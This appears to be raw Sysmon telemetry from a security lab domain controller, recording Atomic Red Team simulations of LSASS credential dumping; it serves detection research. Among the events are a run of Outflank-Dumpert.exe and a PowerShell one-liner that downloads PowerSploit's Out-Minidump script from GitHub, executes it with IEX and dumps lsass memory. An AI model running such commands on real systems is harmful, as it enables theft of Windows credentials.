SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025625Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.656{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 23542300x800000000000000025624Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.656{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025623Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.656{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025622Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.656{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025651Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:24.984{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-out.txtMD5=69E0A51CD2EF01BE27411655D183E5F2,SHA256=CCDCDE20CEF09B0187E0C033DCE185D62178BBC0FC13AA0BCA17F9C3BBF1F869,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025650Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:24.874{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07762C4C04FCDAE2E16E96922FE8A552,SHA256=0A506D6838154CB3CD7942438E3D28447CC778F9D4FA9BBB980E8ECA37A4A2E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025649Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:24.671{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B7818260568AAA2224F0CC7AF4F7C88C,SHA256=48FC919EFC3069071EC32D695FAF5AC3566F1D3B885A1ECF1950FC0A607B00C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025648Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:24.671{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=90B1D1D0DEA35D914107925FE80CFAE5,SHA256=9DAE7C5527706DD6590BD00F5DC451152EE3281210B4FD55E653A121ED818613,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000025647Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.116{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61538-false10.0.1.12-8000- 23542300x800000000000000025710Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.906{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E6CEE6FE4761F0537DF50DE00013745A,SHA256=9C1652B0283723A73CEF98CC2263D890CBB9BD4056182A809ECF4DA89A8CD82B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025709Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.906{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=88D97C5AFA1F845946B4426AE50A5A70,SHA256=C1B5F7B104DDC79C2BF4945A4DFECCB88A114B6C73F6101040618BDFE12E786C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025708Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.906{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=659B8B59DACA0A0A8D6106DFFA447D60,SHA256=71729F28007314CA957E419002818E17B4DC6279DA46EEF05CC3F2A0562BDDB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025707Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.890{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5314098C7D0CD97E9931AAA859E80F4,SHA256=6C63BE9B12763032BF5ED805A6E0A14FCF1AFD9E2C91DF5D7FAD500EF5E1CC8A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025706Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.734{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A341-60D3-5E06-00000000CF01}6316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025705Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.734{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A341-60D3-5E06-00000000CF01}6316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000025704Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.718{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69C136DAE9403995F7A2605645C29B28,SHA256=8415AFF151D3C547281FB036F1C7879DF99A9C150A983683B44244A181269FDE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025703Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.687{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A341-60D3-5E06-00000000CF01}6316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025702Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.687{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A341-60D3-5E06-00000000CF01}6316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000025701Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:25.656{4DB9351A-A341-60D3-5E06-00000000CF01}6316\PSHost.132689562255791957.6316.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025700Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.640{4DB9351A-A341-60D3-5E06-00000000CF01}6316ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_nsnbtjc1.zho.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025699Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.640{4DB9351A-A341-60D3-5E06-00000000CF01}6316ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_atiuc5kt.foj.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025698Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.624{4DB9351A-A341-60D3-5E06-00000000CF01}6316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_atiuc5kt.foj.ps12021-06-23 21:10:25.624 10341000x800000000000000025697Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.609{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A341-60D3-5E06-00000000CF01}6316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025696Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.577{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A341-60D3-5E06-00000000CF01}6316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025695Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.577{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A341-60D3-5E06-00000000CF01}6316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025694Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.577{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025693Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.577{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025692Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.577{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025691Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.577{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025690Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.577{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A341-60D3-5E06-00000000CF01}6316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025689Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.577{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A341-60D3-5E06-00000000CF01}6316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|UNKNOWN(00007FFF5BA1CD48) 154100x800000000000000025688Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.579{4DB9351A-A341-60D3-5E06-00000000CF01}6316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025687Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.577{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025686Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.562{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025685Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.531{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-err.txtMD5=D278848963E5E5EF73F4DE68C985D914,SHA256=214FC575F8147440B0CE3C561FC18ABF3F8F18E50BB4CB1E70507EB687F08E23,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025684Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.499{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A341-60D3-5D06-00000000CF01}6964C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025683Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.499{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A341-60D3-5D06-00000000CF01}6964C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025682Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 